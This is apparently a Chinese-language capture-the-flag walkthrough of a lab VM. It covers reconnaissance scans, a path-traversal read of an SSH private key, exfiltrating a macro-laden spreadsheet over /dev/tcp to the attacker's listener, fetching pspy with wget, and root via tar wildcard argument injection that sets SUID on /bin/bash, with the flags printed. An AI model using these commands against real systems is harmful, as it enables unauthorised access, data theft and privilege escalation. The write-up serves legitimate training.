信息搜集
扫描网段
arp-scan -l
扫描端口
nmap 192.168.109.133 -p- -sS -sC -n --min-rate 5000 -sV
扫描目录
gobuster dir -u http://192.168.109.133 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt,sh,html
渗透阶段
id_rsa 利用
id_rsa文件是 PEM 格式的私钥
条件:
服务器开放2222端口,才有可能利用
读取id_rsa
?inet=../../../../../../../home/cifra/.ssh/id_rsa
如果攻击者获取了 id_rsa 文件:
- 直接访问权限
攻击者可以使用私钥登录对应的远程服务器,无需输入密码(前提是服务器上配置了匹配的公钥id_rsa.pub)。 - 权限滥用
- 如果服务器的
~/.ssh/authorized_keys文件包含了与该私钥匹配的公钥,攻击者将获得完全的访问权限。 - 可能被用于进一步的横向渗透攻击。
- 如果服务器的
vi id_rsa //把私钥粘贴过去
注意粘贴时候第一行的空格,去掉!!!!
chmod 600 id_rsa
ssh cifra@192.168.109.133 -i id_rsa -p 2222
查看有个文件contabilidad.xlsm
服务器传本地
服务端:
cat contabilidad.xlsm > /dev/tcp/192.168.109.128/6666
本地:
开启监听(优先开)
nc -vlp 6666 > 自定义文件名
上传到本地后
安装oletools才可以使用ol
pip install -U oletools
olevba contabilidad.xlsm //分析
用户名和密码拿到
登录
ifconfig
ssh leopoldo@192.168.109.133
然后拿到第一个user用户标志
73f5b965bd7e817a71b853f44ada19b0
本地传服务器
本地:
把文件传到本地上去,再从服务器去拉
service apache2 start //开启Apache服务
一定要到tmp目录下,因为权限高
dpkg -L 命令安装包位置
cp /var/www/html //上传到网站上面
下载
服务器:
cd /tmp
wget http://ip/文件名
传了一个pspy,查看服务器的进程文件
chmod 777 pspy32
./papy32
看到这个基本上就知道利用点是什么了tgz
cd 到tmp目录下一个backup.sh*文件,查看一下
cd /tmp
ll
cat /tmp/backuo.sh
先到这个目录
cd /home/leopoldo/Desktop/scripts/
提权
echo 'chmod +s /bin/bash' > a.sh
touch -- '--checkpoint-action=exec=sh a.sh'
touch -- '--checkpoint=1'
ls -la /bin/bash
bash -p
等个几秒,就执行成功了
后面到root目录拿flag
01d940a42e6a3f5727e2382d9f4f3b87
总结:
今天打这个靶场确实挺麻烦的,有很多新知识点,不过还好。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
